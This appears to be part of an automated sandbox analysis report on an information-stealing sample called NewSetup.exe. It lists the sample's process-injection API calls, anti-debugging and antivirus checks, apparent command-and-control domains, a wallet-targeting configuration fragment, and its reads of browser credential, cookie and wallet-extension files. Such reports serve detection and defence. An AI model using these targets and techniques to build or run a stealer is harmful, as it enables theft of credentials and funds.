              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\NewSetup.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0021F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0021F8E9
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0024A19E mov edi, dword ptr fs:[00000030h]0_2_0024A19E
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_00211FB0 mov edi, dword ptr fs:[00000030h]0_2_00211FB0
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_00211FB0 mov edi, dword ptr fs:[00000030h]3_2_00211FB0
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0022D8E0 GetProcessHeap,0_2_0022D8E0
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0021F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0021F52D
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0021F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0021F8E9
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0021F8DD SetUnhandledExceptionFilter,0_2_0021F8DD
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_00227E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00227E30
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_0021F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0021F52D
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_0021F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0021F8E9
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_0021F8DD SetUnhandledExceptionFilter,3_2_0021F8DD
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_00227E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00227E30

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\NewSetup.exe Code function: 0_2_0024A19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 0_2_0024A19E
              Source: C:\Users\user\Desktop\NewSetup.exe Memory written: C:\Users\user\Desktop\NewSetup.exe base: 400000 value starts with: 4D5A
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hummskitnj.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: cashfuzysao.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: appliacnesot.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: screwamusresz.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: inherineau.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: scentniej.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: rebuildeso.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: prisonyfork.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: stingyerasjhru.click
              Source: C:\Users\user\Desktop\NewSetup.exe Process created: C:\Users\user\Desktop\NewSetup.exe "C:\Users\user\Desktop\NewSetup.exe"
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: EnumSystemLocalesW, 0_2_0022D1BD
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_00231287
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: EnumSystemLocalesW, 0_2_002314D8
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00231580
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: EnumSystemLocalesW, 0_2_002317D3
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetLocaleInfoW, 0_2_00231840
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: EnumSystemLocalesW, 0_2_00231915
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetLocaleInfoW, 0_2_00231960
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00231A07
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetLocaleInfoW, 0_2_00231B0D
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetLocaleInfoW, 0_2_0022CC15
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: EnumSystemLocalesW, 3_2_0022D1BD
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_00231287
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: EnumSystemLocalesW, 3_2_002314D8
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_00231580
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: EnumSystemLocalesW, 3_2_002317D3
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetLocaleInfoW, 3_2_00231840
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: EnumSystemLocalesW, 3_2_00231915
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetLocaleInfoW, 3_2_00231960
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_00231A07
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetLocaleInfoW, 3_2_00231B0D
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: GetLocaleInfoW, 3_2_0022CC15
              Source: C:\Users\user\Desktop\NewSetup.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\NewSetup.exe Code function: 0_2_002200B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime, 0_2_002200B4
              Source: C:\Users\user\Desktop\NewSetup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: NewSetup.exe, NewSetup.exe, 00000003.00000003.2275542472.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322348607.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2318084383.00000000033E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\NewSetup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: Process Memory Space: NewSetup.exe PID: 5680, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Source: NewSetup.exe String found in binary or memory: Electrum-LTC
              Source: NewSetup.exe String found in binary or memory: Wallets/ElectronCash
              Source: NewSetup.exe String found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
              Source: NewSetup.exe, 00000003.00000003.2243277695.00000000033F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: NewSetup.exe String found in binary or memory: ExodusWeb3
              Source: NewSetup.exe String found in binary or memory: %appdata%\Ethereum
              Source: NewSetup.exe, 00000003.00000003.2243462732.000000000342F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: NewSetup.exe, 00000003.00000003.2243277695.00000000033F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
